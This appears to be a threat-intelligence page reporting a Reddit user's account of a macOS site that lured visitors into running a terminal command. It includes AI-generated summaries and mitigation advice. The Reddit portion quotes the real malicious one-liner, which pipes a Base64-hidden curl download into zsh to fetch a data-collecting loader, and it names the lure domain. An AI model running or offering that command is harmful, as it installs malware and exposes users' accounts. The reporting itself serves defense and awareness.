Suspicious ass website asking to run a terminal command (MacOS)
A suspicious website (https://tesfilesr. com/) was reported on Reddit to prompt MacOS users to run a terminal command that downloads and executes a hidden shell script. The script acts as a multi-stage loader that collects system information and telemetry, then conditionally executes a second-stage AppleScript payload silently in the background. The original reporter experienced account compromise on Instagram after running the command, indicating potential malicious activity. No official vendor advisory or patch information is available. The threat appears to be a social engineering attack leveraging terminal command execution on MacOS.
AI Analysis
Technical Summary
This threat involves a malicious website that instructs MacOS users to run a terminal command which decodes a Base64-encoded URL, downloads a shell script via curl, and executes it with zsh. The script collects system and network data, sends telemetry to a remote server, and executes a secondary AppleScript payload via osascript without user awareness. The attack was reported on Reddit with anecdotal evidence of account compromise following execution. There is no indication of a software vulnerability being exploited; rather, it is a user-targeted social engineering attack relying on command execution.
Potential Impact
Execution of the downloaded script can lead to unauthorized data collection (system, locale, IP), telemetry exfiltration, and execution of additional malicious payloads on the victim's MacOS system. The reported consequence includes compromise of online accounts (e.g., Instagram) and potential for further malicious activity such as spreading scams. The attack requires user interaction to run the terminal command, limiting automatic exploitation.
Mitigation Recommendations
No official patch or vendor advisory is available. Users should avoid running untrusted terminal commands from unknown or suspicious websites. Security awareness training to recognize social engineering attempts involving command execution is recommended. Since this is not a software vulnerability, traditional patching does not apply. Monitoring for unusual account activity and changing credentials after suspected compromise is advised.
Suspicious ass website asking to run a terminal command (MacOS)
Description
A suspicious website (https://tesfilesr. com/) was reported on Reddit to prompt MacOS users to run a terminal command that downloads and executes a hidden shell script. The script acts as a multi-stage loader that collects system information and telemetry, then conditionally executes a second-stage AppleScript payload silently in the background. The original reporter experienced account compromise on Instagram after running the command, indicating potential malicious activity. No official vendor advisory or patch information is available. The threat appears to be a social engineering attack leveraging terminal command execution on MacOS.
Reddit Discussion
Soooooo a while ago I found this website called https://tesfilesr.com/ after I was redirected from a fishy free games site. Don't go on it (or do, it's just a set of instructions. Don't follow the instructions I guess)
The site instructed users to run this terminal command: "curl -s $(echo 'aHR0cHM6Ly8xMnJhZnNxd3dxMTIuY29tL2RlYnVnL2xvYWRlci5zaD9idWlsZD01MGU0YWZhY2VjYjcxMDAxZTdlZmJjODU2MTlmY2E0OQ=='|base64 -D)|zsh"
At the time I wasn't thinking right, so I saw that the website had the github logo and said "verified", aaaaaand I actually ran it.
Not too long later, my Instagram acc was hacked:
- Account was set to public
- some crypto scam promo was put on my story.
I kicked them out and changed my password for literally everything)
I analysed the command a bit, and it seems to:
- Use Base64 to decode a hidden URL
- Use curl to download a shell script
- Pipe it directly into zsh to execute
I retrieved the script, and saw that it's a multi stage loader that:
- collects system/locale/IP data
- sends telemetry to a remote server
- conditionally executes a second-stage AppleScript payload via osascript
- and to top it all off, runs it all silently in the background.
But now I'm a bit curious, can someone who's maybe a bit more advanced than me explore this a bit further? Thanks!!
Links cited in this discussion
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat involves a malicious website that instructs MacOS users to run a terminal command which decodes a Base64-encoded URL, downloads a shell script via curl, and executes it with zsh. The script collects system and network data, sends telemetry to a remote server, and executes a secondary AppleScript payload via osascript without user awareness. The attack was reported on Reddit with anecdotal evidence of account compromise following execution. There is no indication of a software vulnerability being exploited; rather, it is a user-targeted social engineering attack relying on command execution.
Potential Impact
Execution of the downloaded script can lead to unauthorized data collection (system, locale, IP), telemetry exfiltration, and execution of additional malicious payloads on the victim's MacOS system. The reported consequence includes compromise of online accounts (e.g., Instagram) and potential for further malicious activity such as spreading scams. The attack requires user interaction to run the terminal command, limiting automatic exploitation.
Mitigation Recommendations
No official patch or vendor advisory is available. Users should avoid running untrusted terminal commands from unknown or suspicious websites. Security awareness training to recognize social engineering attempts involving command execution is recommended. Since this is not a software vulnerability, traditional patching does not apply. Monitoring for unusual account activity and changing credentials after suspected compromise is advised.
Technical Details
- Source Type
- Subreddit
- Malware
- Reddit Score
- 0
- Discussion Level
- minimal
- Content Source
- reddit_link_post
- Post Type
- link
- Domain
- null
- Newsworthiness Assessment
- {"score":27,"reasons":["external_link","established_author","very_recent"],"isNewsworthy":true,"foundNewsworthy":[],"foundNonNewsworthy":[]}
- Has External Source
- true
- Trusted Domain
- false
Threat ID: 6a144a1fa5ae1af1aaa0341b
Added to database: 5/25/2026, 1:09:51 PM
Last enriched: 5/25/2026, 1:10:00 PM
Last updated: 5/25/2026, 11:35:06 PM
Views: 6
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.